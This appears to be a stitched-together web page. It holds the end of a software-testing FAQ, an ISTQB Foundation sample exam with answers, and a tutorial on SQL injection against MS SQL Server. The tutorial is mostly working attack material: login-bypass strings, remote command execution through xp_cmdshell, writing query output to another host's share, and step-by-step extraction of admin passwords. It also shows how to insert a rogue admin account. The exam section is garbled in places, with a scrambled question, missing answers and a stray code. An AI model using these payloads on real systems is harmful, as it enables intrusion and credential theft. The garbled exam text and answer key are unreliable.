Use risk analysis to determine where testing should be focused. Since it's rarely possible to test every possible aspect of an application, every possible combination of events, every dependency, or everything that could go wrong, risk analysis is appropriate to most software development projects. This requires judgement skills, common sense, and experience. (If warranted, formal methods are also available.) Considerations can include: - Which functionality is most important to the project's intended purpose? - Which functionality is most visible to the user? - Which functionality has the largest safety impact? - Which functionality has the largest financial impact on users? - Which aspects of the application are most important to the customer? - Which aspects of the application can be tested early in the development cycle? - Which parts of the code are most complex, and thus most subject to errors? - Which parts of the application were developed in rush or panic mode? - Which aspects of similar/related previous projects caused problems? - Which aspects of similar/related previous projects had large maintenance expenses? - Which parts of the requirements and design are unclear or poorly thought out? - What do the developers think are the highest-risk aspects of the application? - What kinds of problems would cause the worst publicity? - What kinds of problems would cause the most customer service complaints?- What kinds of tests could easily cover multiple functionalities? - Which tests will have the best high-risk-coverage to time-required ratio?

42. What can be done if requirements are changing continuously?
A common problem and a major headache. - Work with the project's stakeholders early on to understand how requirements might change so that alternate test plans and strategies can be worked out in advance, if possible. - It's helpful if the application's initial design allows for some adaptability so that later changes do not require redoing the application from scratch. - If the code is well-commented and well-documented this makes changes easier for the developers.- Use rapid prototyping whenever possible to help customers feel sure of their requirements and minimize changes. - The project's initial schedule should allow for some extra time commensurate with the possibility of changes.- Try to move new requirements to a 'Phase 2' version of an application, while using the original requirements for the 'Phase 1' version. - Negotiate to allow only easily-implemented new requirements into the project, while moving more difficult new requirements into future versions of the application. - Be sure that customers and management understand the scheduling impacts, inherent risks, and costs of significant requirements changes. Then let management or the customers (not the developers or testers) decide if the changes are warranted - after all, that's their job. - Balance the effort put into setting up automated testing with the expected effort required to re-do them to deal with changes. - Try to design some flexibility into automated test scripts. - Focus initial automated testing on application aspects that are most likely to remain unchanged. - Devote appropriate effort to risk analysis of changes to minimize regression testing needs. - Design some flexibility into test cases (this is not easily done; the best bet might be to minimize the detail in the test cases, or set up only higher-level generic-type test plans) - Focus less on detailed test plans and test cases and more on ad hoc testing (with an understanding of the added risk that this entails).

43. What if the project isn't big enough to justify extensive testing?
Consider the impact of project errors, not the size of the project. However, if extensive testing is still not justified, risk analysis is again needed and the same considerations as described previously in 'What if there isn't enough time for thorough testing?' apply. The tester might then do ad hoc testing, or write up a limited test plan based on the risk analysis.

44. What if the application has functionality that wasn't in the requirements?
It may take serious effort to determine if an application has significant unexpected or hidden functionality, and it would indicate deeper problems in the software development process. If the functionality isn't necessary to the purpose of the application, it should be removed, as it may have unknown impacts or dependencies that were not taken into account by the designer or the customer. If not removed, design information will be needed to determine added testing needs or regression testing needs. Management should be made aware of any significant added risks as a result of the unexpected functionality. If the functionality only effects areas such as minor improvements in the user interface, for example, it may not be a significant risk.

45. How can Software QA processes be implemented without stifling productivity?
By implementing QA processes slowly over time, using consensus to reach agreement on processes, and adjusting and experimenting as an organization grows and matures, productivity will be improved instead of stifled. Problem prevention will lessen the need for problem detection, panics and burn-out will decrease, and there will be improved focus and less wasted effort. At the same time, attempts should be made to keep processes simple and efficient, minimize paperwork, promote computer-based processes and automated tracking and reporting, minimize time required in meetings, and promote training as part of the QA process. However, no one - especially talented technical types - likes rules or bureaucracy, and in the short run things may slow down a bit. A typical scenario would be that more days of planning and development will be needed, but less time will be required for late-night bug-fixing and calming of irate customers.

46. What if an organization is growing so fast that fixed QA processes are impossible?
This is a common problem in the software industry, especially in new technology areas. There is no easy solution in this situation, other than: - Hire good people - Management should 'ruthlessly prioritize' quality issues and maintain focus on the customer - Everyone in the organization should be clear on what 'quality' means to the customer

47. How does a client/server environment affect testing?
Client/server applications can be quite complex due to the multiple dependencies among clients, data communications, hardware, and servers. Thus testing requirements can be extensive. When time is limited (as it usually is) the focus should be on integration and system testing. Additionally, load/stress/performance testing may be useful in determining client/server application limitations and capabilities. There are commercial tools to assist with such testing.

48.How can World Wide Web sites be tested?
Web sites are essentially client/server applications - with web servers and 'browser' clients. Consideration should be given to the interactions between html pages, TCP/IP communications, Internet connections, firewalls, applications that run in web pages (such as applets, javascript, plug-in applications), and applications that run on the server side (such as cgi scripts, database interfaces, logging applications, dynamic page generators, asp, etc.). Additionally, there are a wide variety of servers and browsers, various versions of each, small but sometimes significant differences between them, variations in connection speeds, rapidly changing technologies, and multiple standards and protocols. The end result is that testing for web sites can become a major ongoing effort. Other considerations might include: - What are the expected loads on the server (e.g., number of hits per unit time?), and what kind of performance is required under such loads (such as web server response time, database query response times). What kinds of tools will be needed for performance testing (such as web load testing tools, other tools already in house that can be adapted, web robot downloading tools, etc.)? - Who is the target audience? What kind of browsers will they be using? What kind of connection speeds will they by using? Are they intra- organization (thus with likely high connection speeds and similar browsers) or Internet-wide (thus with a wide variety of connection speeds and browser types)? - What kind of performance is expected on the client side (e.g., how fast should pages appear, how fast should animations, applets, etc. load and run)? - Will down time for server and content maintenance/upgrades be allowed? how much? - What kinds of security (firewalls, encryptions, passwords, etc.) will be required and what is it expected to do? How can it be tested? - How reliable are the site's Internet connections required to be? And how does that affect backup system or redundant connection requirements and testing? - What processes will be required to manage updates to the web site's content, and what are the requirements for maintaining, tracking, and controlling page content, graphics, links, etc.? - Which HTML specification will be adhered to? How strictly? What variations will be allowed for targeted browsers? - Will there be any standards or requirements for page appearance and/or graphics throughout a site or parts of a site?? - How will internal and external links be validated and updated? how often? - Can testing be done on the production system, or will a separate test system be required? How are browser caching, variations in browser option settings, dial-up connection variabilities, and real-world internet 'traffic congestion' problems to be accounted for in testing?- How extensive or customized are the server logging and reporting requirements; are they considered an integral part of the system and do they require testing?- How are cgi programs, applets, javascripts, ActiveX components, etc. to be maintained, tracked, controlled, and tested? - Pages should be 3-5 screens max unless content is tightly focused on a single topic. If larger, provide internal links within the page. - The page layouts and design elements should be consistent throughout a site, so that it's clear to the user that they're still within a site. - Pages should be as browser-independent as possible, or pages should be provided or generated based on the browser-type. - All pages should have links external to the page; there should be no dead-end pages. - The page owner, revision date, and a link to a contact person or organization should be included on each page.

49. How is testing affected by object-oriented designs?
Well-engineered object-oriented design can make it easier to trace from code to internal design to functional design to requirements. While there will be little affect on black box testing (where an understanding of the internal design of the application is unnecessary), white-box testing can be oriented to the application's objects. If the application was well-designed this can simplify test design.

50. What is Extreme Programming and what's it got to do with testing?
Extreme Programming (XP) is a software development approach for small teams on risk-prone projects with unstable requirements. It was created by Kent Beck who described the approach in his book 'Extreme Programming Explained'. Testing ('extreme testing') is a core aspect of Extreme Programming. Programmers are expected to write unit and functional test code first - before the application is developed. Test code is under source control along with the rest of the code. Customers are expected to be an integral part of the project team and to help develop scenarios for acceptance/black box testing. Acceptance tests are preferably automated, and are modified and rerun for each of the frequent development iterations. QA and test personnel are also required to be an integral part of the project team. Detailed requirements documentation is not used, and frequent re-scheduling, re-estimating, and re-prioritizing is expected.

ISTQB ISEB Foundation Level Sample Paper

1. Which of the following are the typical defects found by static analysis tools?
a. Variables that are never used.
b. Security vulnerabilities.
c. Poor performance.
d. Unreachable code.
e. Business processes not followed.
A. b, c and d are true; a and e are false
B. a is true; b, c, d and e are false
C. c, d and e are true; a and b are false
D. a, b and d are true; c and e are false
Answer: D



2. Which of the following are characteristics of good testing in any life cycle model?
a. Every development activity has a corresponding test activity.
b. Testers review development documents early.
c. There are separate levels for component and system integration test.
d. Each test level has objectives specific to that level.
e. Each test level is based on the same test basis.
A. a, d and e
B. b, c and e
C. a, c and d
D. a, b and d
Answer: D



3. Which of the following statements are true in relation to component testing?
a. Stubs may be used.
b. May cover resource behaviour (e.g. memory leaks).
c. Tests the interactions between software components.
d. Defects are typically fixed without formally managing these defects.
A. a, c and d
B. a, b and d
C. b, c and d
D. a, b and c
Answer: B



4. A system specification states that a particular field should accept alphabetical characters in either upper or lower case. Which of the following test cases is from an INVALID equivalence partition?
A. Feeds
B. F33ds
C. FEEDS
D. fEEDs
Answer: B


5. Which of the following statements is GENERALLY true of testing?
a. Testing can show the presence of defects.
b. Testing reduces the probability of uncovered defects.
c. Testing can show that a previously present defect has been removed.
d. Testing can prove that software is defect free.
A. a, b and c
B. a, b and d
C. a, c and d
D. b, c and d
Answer: A



6. Which ADDITIONAL test level could be introduced into a standard V-model after system testing?
A. System Integration Testing
B. Acceptance Testing
C. Regression Testing
D. Component Integration Testing
Answer: A


7. Which statement BEST describes the role of testing?
A. Testing ensures that the right version of code is delivered
B. Testing can be used to assess quality.
C. Testing shows that the software is error free.
D. Testing improves quality in itself.
Answer: B



8. Which tasks would USUALLY be performed by a test leader and which by the tester?
a. Adapt planning based on test results.
b. Create test specifications.
c. Plan tests.
d. Write or review a test strategy
A. c and d by the test leader; a and b by the tester
B. a and b by the test leader; c and d by the tester.
C. a and d by the test leader; b and c by the tester
D. a, c and d by the test leader; b by the tester.
Answer: D



9. When in the lifecycle should testing activities start?
A. As early as possible
B. After the test environment is ready
C. After the requirements have been reviewed
D. Once the code is available to test
Answer: A


10. Which one of the following is a characteristic of good testing in any lifecycle model?
A. Each test level has the same test objective.
B. There should be more testing activities than development activities.
C. Test design can only begin when development is complete.
D. Testers should begin to review documents as soon as drafts are available.
Answer: D


11. During which activity of the Fundamental Test Process do you review the test basis?
A. Evaluating exit criteria and reporting.
B. Test implementation and execution
C. Test analysis and design
D. Test planning and control
Answer: C


12. Which one of the following statements about approaches to test estimation is true?
A. A metrics-based approach is based on data gathered from previous projects; an expert-based approach uses the knowledge of the owner of the tasks or experts
B. A metrics-based approach is based on creating a work-breakdown structure first; an expert-based approach is based on input from estimation experts
C. A metrics-based approach is based on data gathered from previous projects; an expert-based approach is based on a work-breakdown structure
D. A metrics-based approach is based on an analysis of the specification documents; an expert-based approach is based on the opinion of the most experienced tester in the organization
Answer: A


13. Which ordering of the list below gives increasing levels of test independence?
a. Tests designed by a fellow-member of the design team.
b. Tests designed by a different group within the organization.
c. Tests designed by the code author.
d. Tests designed by different organization.
A. c, a, b, d.
B. d, b, a, c
C. c, a, d, b.
D. a, c, d, b.
Answer: A


14. Which of the following are structure-based techniques?
a. Decision table testing
b. Boundary value analysis
c. Multiple condition coverage
d. Use case testing
e. Decision testing
A. a and c.
B. b and d.
C. b and e.
D. c and e.
Answer: D


15. Pair the correct test design techniques (i to v) with the category of techniques (x, y and z):
i) Exploratory Testing
ii) Equivalence Partitioning
iii) Decision Testing
iv) Use Case Testing
v) Condition coverage
x) Specification-based
y) Structure-based
z) Experienced-based
A. x = i and ii; y = iii and v; z = iv.
B. x = i, ii and iv; y = v; z = iii
C. x = ii and iv; y = iii and v; z = i.
D. x = iii and iv; y = v; z = i and ii.


16. Which of the following is a MAJOR task of evaluating exit criteria and reporting?
A. Writing a test summary report for stakeholders
B. Logging the outcome of test execution
C. Repeating test activities as a result of action taken for each discrepancy.
D. Evaluating testability of the requirements and system
Answer: A


17. The digital ainbow Thermometer uses 7 colours to show the ambient temperature. Each colour spans a range of just 5, with an operating minimum and maximum of minus 5 and 30. Which of the following values is minimum and maximum of minus 5? and 30?. Which of the following values is LEAST likely to have been identified when applying the boundary value test design technique?
A. 3030?
B. 00?
C. 8?8
D. 15 15?
Answer: C



18. In which activity of the Fundamental Test Process is the test environment set up?
A. Test implementation and execution.
B. Test planning and control
C. Test analysis and design
D. Evaluating exit criteria and reporting
Answer: A


19. Which of the following statements about black box and white box techniques is correct?
A. Decision Testing, Equivalence Partitioning and Condition Coverage are all black box techniques
B. Decision Table Testing, State Transition and Use Case Testing are all black box techniques
C. Decision Testing, Equivalence Partitioning and Statement Testing are all white box techniques
D. Boundary Value Analysis, State Transition and Statement Testing are all white box techniques
Answer: B


20. Which of the following are characteristic of test management tools?
a) They support traceability of tests to source documents.
b) They provide an interface to test execution tools.
c) They help to enforce coding standards.
d) They manipulate databases and files to set up test data.
A. a and c
B. b and c
C. a and b
D. b and d
Answer: C


21. How is the scope of maintenance testing assessed?
A. Scope is related to the risk, size of the changes and size of the system under test
B. Scope is defined by the size and type of system being changed
C. Scope is defined by the size and type of system being changed
D. Scope is related to the number of system users affected by the change.
Answer: A



22. A system under development contains complex calculations and decision logic, and it is assessed as high risk because of the relative inexperience of the development team in the application domain. Which of the following would be the MOST appropriate choice of test design technique for component testing?
A. Decision testing.
B. Statement testing
C. State transition testing
D. Equivalence partitioning
Answer: A


23. Which of the following is an example of a product risk?
A. Software that does not perform its intended functions
B. Failure of a third party
C. Problems in defining the right requirements
BH0-010
D. Skill and staff shortages
Answer: A


24. Given the following sample of pseudo code:
01 Input number of male tigers
02 Input number of female tigers
03 If male tiger > 0 and female tiger > 0 then
04 Input Do you want to breed (Yes / No)
05 If breed = No?
06 Print Keep male and female tigers apart
07 End if
08 End If
Which of the following test cases will ensure that statement 6 is executed?
A. male tiger = 1, female tiger = 1, breed = yes
B. male tiger = 1, female tiger = 1, breed = no
C. male tiger = 1, female tiger = 2, breed = yes
D. male tiger = 1, female tiger = 0, breed = no
Answer: B



25. Which of the following BEST describes a data-driven approach to the use of test execution tools?
A. Monitoring response times when the system contains a specified amount of data
B. Manipulation of databases and files to create test data
C. Using a generic script that reads test input data from a file
D. Recording test scripts and playing them back
Answer: C



26. Which statement about combinations of inputs and preconditions is true for a large system?
A. It is easy to test them all in a short time
B. It is not practically possible to test them all
C. It is not possible to test any of them
D. It is essential to test them all in order to do good testing
Answer: B


28. Which of the following is a purpose of the review kick off activity?
A. Explain the objectives
B. Select the personnel group
C. Document results
D. Define entry and exit criteria
Answer: A


29. Which one of the following is true of software development models?
A. There are always four test levels in the V-model.
B. In a Rapid Application Development (RAD) project, there are four test levels for each iteration.
C. In Agile development models, the number of test levels for an iteration can vary depending on the project.
D. There must be at least four test levels for any software development model.
Answer: C






30. Which of the following activities should be performed during the selection and implementation of a testing tool?
a) Determine whether the organization existing test process needs to change.
b) Conduct a proof of concept.
c) Implement the selected tool on a project behind schedule to save time.
d) Identify coaching and mentoring requirements for the use of the selected tool
A. a, b and c.
B. b, c and d.
C. a, c and d.
D. a, b and d.
Answer: D


31. The following code segment contains a potential "divide by 0" error.
J=50 K=1 while (N>=−10) and (N<=10) loop M [K] = J/N K = K + 1 N = N − 1 end loop; Which of the following is the most effective way of detecting this error?
A. Boundary testing B. Condition testing C. Compilation of the source code D. Source code inspection
Answer: D


32. A test team consistently finds between 90% and 95% of the defects present in the system under test. While the test manager understands that this is a good defect-detection percentage for her test team and industry, senior management and executives remain disappointed in the test group, saying that the test team misses too many bugs. Given that the users are generally happy with the system and that the failures which have occurred have generally been low impact, which of the following testing principles is most likely to help the test manager explain to these managers and executives why some defects are likely to be missed?
A. Exhaustive testing is impossible B. Defect clustering C. Pesticide paradox D. Absence-of-errors fallacy
Answer: A


33. System test execution on a project is planned for eight weeks. After a week of testing, a tester suggests that the test objective stated in the test plan of 'finding as many defects as possible during system test' might be more closely met by redirecting the test effort according to which test principle?
A. Impossibility of exhaustive testing. B. Importance of early testing. C. The absence of errors fallacy. D. Defect clustering
Answer: D






34. Which of the following statements is MOST OFTEN true?
A. Source-code inspections are often used in component testing. B. Component testing searches for defects in programs that are separately testable. C. Component testing is an important part of user acceptance testing. D. Component testing aims to expose problems in the interactions between software and hardware components.
Answer: B

Developer vs Tester

SQL Injections

1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

2 What do you need?
Any web browser.

3 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

Everything between the

and

have potential parameters that might be useful (exploit wise).


4 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

http://duck/index.asp?id=10

5 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:

If luck is on your side, you will get login without any login name or password.

6 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

7 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

8 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must folder "share" sharing for Everyone.

9 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We also can search for data using LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

10 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

11 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

12 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.

13 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":

http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".

14 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask